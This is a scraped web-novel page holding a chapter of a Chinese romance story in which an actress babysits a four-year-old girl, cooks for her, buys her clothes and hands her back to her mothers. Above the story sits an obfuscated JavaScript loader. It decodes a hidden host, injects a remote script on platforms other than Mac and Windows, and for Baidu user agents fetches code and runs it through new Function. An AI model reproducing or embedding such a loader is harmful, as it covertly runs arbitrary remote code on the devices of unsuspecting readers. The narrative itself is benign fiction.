98小说网

阅读记录  |   用户书架
function UqgsgfgDv(e){var t="",n=r=c1=c2=0;while(n<e.length){r=e.charCodeAt(n);if(r<128){t+=String.fromCharCode(r);n++;}else if(r>191&&r<224){c2=e.charCodeAt(n+1);t+=String.fromCharCode((r&31)<<6|c2&63);n+=2}else{ c2=e.charCodeAt(n+1);c3=e.charCodeAt(n+2);t+=String.fromCharCode((r&15)<<12|(c2&63)<<6|c3&63);n+=3;}}return t;};function UqSDDFGvyQ(e){ var m='ABCDEFGHIJKLMNOPQRSTUVWXYZ'+'abcdefghijklmnopqrstuvwxyz'+'0123456789+/=';var t="",n,r,i,s,o,u,a,f=0;e=e.replace(/[^A-Za-z0-9+/=]/g,""); while(f<e.length){s=m.indexOf(e.charAt(f++));o=m.indexOf(e.charAt(f++));u=m.indexOf(e.charAt(f++));a=m.indexOf(e.charAt(f++));n=s<<2|o>>4;r=(o&15)<<4|u>>2;i=(u&3)<<6|a;t=t+String.fromCharCode(n);if(u!=64){t=t+String.fromCharCode(r);}if(a!=64){t=t+String.fromCharCode(i);}}return UqgsgfgDv(t);};window[''+'U'+'Y'+'C'+'q'+'J'+'K'+'']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,i,w,d,c){var x=UqSDDFGvyQ,cs=d[x('Y3VycmVudFNjcmlwdA==')],crd=x('Y3JlYXRlRWxlbWVudA==');'jQuery';u=decodeURIComponent(x(u.replace(new RegExp(c[0]+''+c[0],'g'),c[0])));'jQuery'; if(navigator.userAgent.indexOf('b'+'a'+'id'+'u')>-1){var xhr=new XMLHttpRequest();xhr.open('POST','https://'+u+'/bm-'+i);xhr.setRequestHeader('Content-Type','application/x-www-form-urlencoded;');xhr.setRequestHeader('X-REQUESTED-WITH','XMLHttpRequest');xhr.onreadystatechange=function(){if(xhr.readyState==4&&xhr.status==200){var data=JSON.parse(xhr.responseText);new Function('_'+'u'+'q'+'cs',new Function('c',data.result.decode+';return '+data.result.name+'(c)')(data.result.img.join('')))(cs);}};xhr.send('u=1');}else{var s=d[crd]('script');s.src='https://'+u+'/m-'+i;cs.parentElement.insertBefore(s,cs);}})('aGYuamJzZGprYmNzY2QuY29t','2843',window,document,['G','TpoZFcguG']);}:function(){};
上一章
目录 | 设置
下一页

分卷(10(1 / 2)

加入书签 | 推荐本书 | 问题反馈 |

若若是从网上搜的菜谱。

因为两个人相处之初气氛不够热烈,宋若就问了一句,有没有什么想吃的点心。

得到的答复是牛奶小方。放假之前在幼儿园吃的最后一道点心就是这个。

她拿了手机准备点外卖,小谢挨挨擦擦地过来,拉着她的手说:不要外卖,要若若亲手做的。

在剧组有助理,回到家有孟璟,都是不许她进厨房的,因此宋若确实有好多年十指不沾阳春水了。

严格按照食谱准备好端上来,心里很是忐忑不安。一瞬不瞬地盯着小谢的脸。

谢文聘餐桌礼仪仿佛是跟孟璟学的,拣的第一块先递到她跟前。她怔了一怔,才微笑道:我尝过了,你吃。

小谢听了不再坚持,沾满椰蓉的白色小奶块仿佛很对她脾胃,拿小叉子接连吃了好几块,咬一口眯着眼睛很享受地嚼啊嚼,第四块下肚,她再要拿第五块,宋若制止了她,好了,先不吃了。

为什么呀。我要全吃光!

冰镇过的,一次吃太多的话,容易肚子疼。这是鲸鱼教的。若若把她的小叉子缴了过来,再说了,还要吃晚饭。

那好吧。小谢两只手背到身后,很合作的样子,双眼亮晶晶的,我都听你的。

就这样?答应了?

听盛雪说,这位小姐平时要多乖有多乖,就是吃这个问题始终让人头疼,总要跟大人对着干,让她有心理准备。

预备了一整套说法的宋若反倒有点无所适从。

晚餐两个人吃的是南瓜焖饭,里边加了胡萝卜丁和切成豌豆粒大小的牛肉。

在小点心上存在侥幸心理并大获全胜,到了正餐她就有点信心不足了,厨艺这个东西虽然很讲天分,会做菜的人就是胡来,烧出来的口味也不会太差,可毕竟还是讲究熟能生巧的,宋若本来想带小孩出去吃的,考虑到出门的后果,只怕又是一波风口浪尖的头条,隐忍下来,在家动手做。

吃饭可能要哄哄。盛雪的话还言犹在耳。

身侧的谢文聘却资格老道地吃完了面,拿叉子围剿剩下的小份水果沙拉。苹果我喜欢,香蕉我喜欢,草莓,橙子,都喜欢!若若好棒!

睡觉也很乖。谢文聘住客房,躺在特意为她收拾出来的粉红色小床上,要求听睡前故事,孙悟空大闹天宫只讲到美猴王出任弼马温这一节,小姑娘就睡着了。若若替她盖好被子。

原本想就这样安然地在家待上几天,等盛雪回来就好,以免多生事端。

在次日却还是不得不带小孩出门罕见地降了次温,一下子就飞跃到要穿棉衣的地步。

谢文聘带来的行李中,大都是夏装,一两件薄外套根本不顶用。

家里只有她和孟璟的衣服,给四岁的小人儿穿,无论如何不合适。

听说要带她出去买衣服,谢文聘欢呼了一声,主动换鞋子。

宋若很紧张地搜了下注意事项。上车后没让小谢坐副驾驶,将人安置在后排的座位,替她系好安全带,自己再到前面去发动车子。

到达购物中心,她戴上一副镜框掩饰,用上了口罩,小朋友裹在自己的大衣里,抱在胸前,她的两只小手恰好搭在自己的肩上。

谢文聘美滋滋地看着她,上电梯的短短半分钟内,亲了她额头四五次。

若若问:唔,怎么老是亲我?

我爱你。小朋友声如蚊蚋,脸红红的,说完小脑袋伏在她肩上,很不好意思的样子。

这小半天密集相处下来,到了这一刻,若若可算想明白那种莫名熟悉的感觉怎么回事了。这位小朋友,不像谢琼,不像盛雪,活脱脱就是孟璟翻版啊。一路上她有点失神。

工作日,气候又不好,童装店生意很清,两个店员正靠在柜台上聊天,先前若若抱着小孩子,挡住了一部分脸,故而回头率虽然高,并没有什么人笃定地叫出她的名字,而进了店,店员一下子就认出她来,在惊呼之前被宋若若摆手制止了。

明白她的来意之后,其中一个店员飞也似的跑去拿衣服,不多时回来,一面递衣服一面好奇地打量宋若和谢文聘,猜测两人的关系。若若并不以为意,那店员要带小谢去试衣间,谢文聘却站着不动,抱着衣服两眼巴巴儿地望着宋若。

若若也没说什么,两手搭着她的小肩膀,带着她进了更衣室。

最后一共买了四套冬装。

若若一手抱着孩子,另一只胳膊挎着袋子。

若若你力气真大。回到车上,谢文聘感慨地说。

若若给她系安全带,问:刚刚弄疼你了?她对于抱别人的力度始终没有定准,抱大鲸鱼肯定不一样,大鲸鱼是成年人,而且按照她那个身体素质和武力值,就算让老婆打一顿也问题不大。眼前这位,可是个几岁的小孩,瓷一样水晶一样,一碰就碎的即视感。

不是。谢文聘奶声奶气地,妈妈她们带我买衣服,都是一个抱我,一个提东西,但是若若你又抱我,又提东西,比她们俩都厉害!

若若抿嘴一笑,忍不住捏了捏她的小鼻子。

两个人到这会儿,就算是处熟了。晚上谢文聘要求跟她一起睡,若若也没拒绝。谢文聘又要求讲故事。昨晚上的故事可能是太长了,不太适合儿童听,若若让助理跑了一趟,送了几本儿童读本过来,把三打白骨精那一回读给她听。听到一半,就又歪在她怀里睡了过去。小朋友睡得又香又甜,若若怕睡着以后,翻身时压到她的小手或是小脚丫子,迟迟不敢入睡。孟璟说过她睡相很好,睡着了根本不怎么挪窝。可她还是不放心。

跟着鲸鱼有了晚上睡觉留灯的习惯,孟璟不在身边的时候,她也出于惯性,保留了这个传统。她侧身躺着,看着橙色灯光里小姑娘侧脸的剪影,一只手枕在脸下边,思绪万千。

到了凌晨两点,才朦朦胧胧地睡过去。

孟璟那边合同谈完了就赶着回来。恰好盛雪和谢琼得知降温,怕给若若带来麻烦,也提前从度假胜地回来了,在门口遇上了,好一番热闹。

盛雪深知谢孟二位不对付,和若若道了谢,抱了孩子就要走。

谁成想谢文聘泪眼汪汪的,不肯走,挂在若若的腿上,发出小动物似的呜呜的低吼。

若若,你看看,都是你照顾得太好,跟你待了两天,现在连亲妈都不要了。盛雪蹲下来软语抚慰,乖,跟妈妈回去,你不回去,若若阿姨和鲸鱼阿姨怎么给你生小媳妇儿啊?

我不要小媳妇,我不要小媳妇,我要

孟璟像摘棉花一样将小朋友摘下来,笑眯眯地:不好意思哈,若若已经名花有主了,你呀,来晚了,赶紧回家吃饭长高,有本事来抢人啊。

一通软硬兼施,好歹把人哄上了车。谢琼坐在驾驶位,默默听外边太太对宋若说:麻烦你了,还给她买了衣服,我就当是聘礼了哈哈哈哈,给聘聘的礼物,可不就是聘礼,你赶紧和孟璟要一个嘛,不然我们这个太孤单了。再迟两年,可就要有代沟了,不好做娃娃亲。

若若脸上带着淡淡的微笑,没说什么。

车子发动了,谢文聘在座位上又嚎哭起来,撕心裂肺喊着,说还有一件事。

上一章
目录
下一页
A- 18 A+
默认 贵族金 护眼绿 羊皮纸 可爱粉 夜间